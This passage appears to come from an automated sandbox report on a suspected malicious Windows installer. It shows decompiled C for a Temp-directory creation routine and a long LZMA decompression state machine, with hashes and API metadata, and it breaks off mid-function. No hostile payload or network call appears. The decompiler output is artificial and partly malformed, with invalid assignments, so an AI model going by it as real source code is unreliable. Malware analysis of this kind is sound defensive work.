                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountFileNameTempTick
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                    • API String ID: 1716503409-944333549
                                                                                    • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                    • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                                                    • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                    • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 86%
                                                                                    			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                                                    0x004015c1
                                                                                    0x004015c9
                                                                                    0x004015cc
                                                                                    0x004015d1
                                                                                    0x004015d5
                                                                                    0x004015d7
                                                                                    0x004015df
                                                                                    0x004015e1
                                                                                    0x004015e4
                                                                                    0x004015ea
                                                                                    0x00401604
                                                                                    0x00401607
                                                                                    0x004015ec
                                                                                    0x004015ec
                                                                                    0x004015ef
                                                                                    0x00000000
                                                                                    0x004015fa
                                                                                    0x004015fd
                                                                                    0x004015fd
                                                                                    0x004015ef
                                                                                    0x0040160e
                                                                                    0x00401615
                                                                                    0x00401624
                                                                                    0x00401624
                                                                                    0x00401617
                                                                                    0x0040161a
                                                                                    0x00401622
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00401622
                                                                                    0x00401615
                                                                                    0x00401627
                                                                                    0x0040162b
                                                                                    0x0040162c
                                                                                    0x004015d7
                                                                                    0x00401634
                                                                                    0x00401663
                                                                                    0x004022f1
                                                                                    0x00401636
                                                                                    0x00401638
                                                                                    0x00401645
                                                                                    0x0040164d
                                                                                    0x00401655
                                                                                    0x0040165b
                                                                                    0x0040165b
                                                                                    0x00401655
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50, 4!u.!u,?,75212EE0,00405D94,?,75213420,75212EE0,00000000), ref: 00405FF0
                                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                      • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                                    • API String ID: 1892508949-670666241
                                                                                    • Opcode ID: f9818ff53e55dff0036ee2081be2677014194c66cae7092a79eef61f1a688098
                                                                                    • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                                                    • Opcode Fuzzy Hash: f9818ff53e55dff0036ee2081be2677014194c66cae7092a79eef61f1a688098
                                                                                    • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 99%
                                                                                    			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
